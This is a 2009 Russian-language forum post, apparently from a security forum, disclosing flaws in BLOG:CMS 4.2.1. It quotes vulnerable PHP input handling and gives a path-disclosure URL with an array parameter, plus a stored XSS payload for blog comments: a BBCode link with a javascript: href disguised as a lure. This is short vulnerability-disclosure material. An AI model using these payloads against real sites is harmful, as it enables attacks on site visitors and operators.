08.11.2009, 06:03
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
BLOG:CMS 4.2.1
BLOG:CMS v4.2.1
Раскрытие путей
Уязвимой код:
PHP код:
$this->formdata = array(
'id' => $blog?$blog->getID():$CONF['DefaultBlog'],
'query' => htmlspecialchars(getVar('query')),
);
/photo/index.php?gallery[]=Corvette
Уязвимый код:
PHP код:
$_REQUEST = array_map("htmlentities", $_REQUEST);
Активная XSS
Уязвимость находиться в комментариях к блогу (Его записям).
[a href=javascript:alert();]Free Porno![/a]
|
|
|